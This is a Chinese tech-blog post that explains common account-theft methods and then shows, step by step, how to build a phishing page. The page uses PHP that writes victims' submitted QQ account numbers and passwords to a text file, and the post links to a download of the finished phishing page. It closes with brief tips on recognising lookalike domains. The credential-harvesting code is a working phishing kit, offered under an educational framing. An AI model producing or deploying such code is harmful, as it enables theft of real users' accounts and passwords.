你的账号是怎样被盗的(鱼站解析)


在网上聊天最常见的就是账号被盗,但有的人竟然不知道是怎样被盗的,今天博主就带大家解析盗号方法与钓鱼网站。

目前网上盗号方法

看了这几种方法你号又被盗了,那指定是你的问题

  1. 钓鱼网站:给你某个网站或者二维码说什么“这是你吗?”啥的就是诱导你输入账号密码的,这个我会详解
  2. cookie盗号:通过某种方式获取到你的cookie,再用cookie光明正大的登录你的账号(此方法少见,涉及到技术方面太多,一般盗号者也没这技术,如果遇到了我会详解)
  3. 沙雕式盗号:偷你手机手动盗号
  4. 社工盗号:盗号者会对你的个人信息进行人肉,再通过这些信息来伪造人物(你)迷惑官方帮他改密码(通俗的说就是他有你的所有信息,他就是你,官方申诉)
  5. 老密盗号:利用你不改密码的习惯,配合社工库进行盗号(技术垃圾,成功率低,少见)

钓鱼盗号原理

钓鱼盗号最为常见,下面博主就讲解一下他的原理
看图:
文生技术博客
钓鱼网站就这么简单,盗号者最为重要的就是让你觉得这是官网

亲自带你写一个最简单的钓鱼网站

温馨提示:仅带你了解钓鱼网站原理,真正的钓鱼网站没这么简单

先看一下源代码,点我下载(编号9)
由于时间问题,我就不自己写了,我就直接把别人的源码改成自己的
就改这个网站

文生技术博客

先来写钓鱼主程序

我们要将账号和密码写入到一个文件中,所以我们需要先打开这个文件,没有就创建,在php中是这样的

$myfile = fopen("cwsya.txt", "a");

打开这个文件了,接下来获取账号密码,php中是$_POST["id"]
那么要写入的文本用代码形式就是

$txt = "|".$_POST["uin"]."----".$_POST["pwd"];

现在已获取到账号密码,写入代码是

fwrite($myfile, $txt);

最后,我们关闭这个文件

fclose($myfile);

所以,代码是这样的

$myfile = fopen("cwsya.txt", "a") or die("Unable to open file!");
$txt = "|".$_POST["uin"]."----".$_POST["pwd"];
fwrite($myfile, $txt);
fclose($myfile);

这样就又出现一个问题,如果用户啥也没输怎么办,所以要进行优化

if (isset($_POST["uin"])) {
        if (isset($_POST["pwd"])) {
            $myfile = fopen("cwsya.txt", "a") or die("Unable to open file!");
            $txt = "|".$_POST["uin"]."----".$_POST["pwd"];
            fwrite($myfile, $txt);
            fclose($myfile);
        }
    }

写于原本代码

我们将这些代码写入到原本源码的php文件中
文生技术博客
这样就好了,用户输入账号密码后点击提交,账号密码将会写入到cwsya.txt中
已写入钓鱼代码的网页下载地址为:点我进入(编号10)

效果如何

文生技术博客

如何辨别钓鱼网站

比如腾讯网站是:http://www.qq.com
钓鱼网站可能就是:http://www.qq1.com 之类的。
有些网址看上去很复杂,其实要识别钓鱼网站的方法很简单:

  1. 去除http:// 这个标准的开头部分
  2. 找到第一个斜杠(/)
  3. 然后向左看,是否能发现是自己熟悉的网址

比如 http://123.xxx.2342.qq.com.cn/sfafafa/yy/xx 这个网址
去掉http:// 结果:123.xxx.2342.qq.com.cn/sfafafa/yy/xx
找到第一个斜杠,后面的就忽略掉, 结果:123.xxx.2342.qq.com.cn/
从斜杠向左看, 先是.cn 然后是 .com 然后是 .qq 发现了qq,然后对比一下实际的qq域名:qq.com/
很明显这个 qq.com.cn/ 是和官方不相同的,有可能是个钓鱼网站。
不管具体的网址多么复杂,你只需要观察这一个小部分就足够了。

声明:文生技术博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - 你的账号是怎样被盗的(鱼站解析)


做个俗人,贪财好色。